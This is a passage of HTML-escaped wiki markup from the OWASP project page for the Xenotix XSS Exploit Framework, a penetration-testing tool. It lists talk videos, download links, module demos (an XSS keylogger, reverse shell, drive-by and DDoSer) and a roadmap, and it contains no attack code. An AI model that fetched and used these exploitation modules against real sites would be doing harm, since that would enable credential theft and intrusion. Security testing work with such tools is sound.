&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
'''ClubHack 2013'''&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:WEBKIT DEVELOPER.png|thumb|530px|left|WebKit Developer Tools]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Button1.png | link=http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar]]&lt;br /&gt;
&lt;br /&gt;
*'''Version 4.5 Mirror 2: [https://www.dropbox.com/s/j6fajc73zz0dgje/Xenotix_XSS_Exploit_Framework_v4.5.rar DropBox]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 2 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	</feed>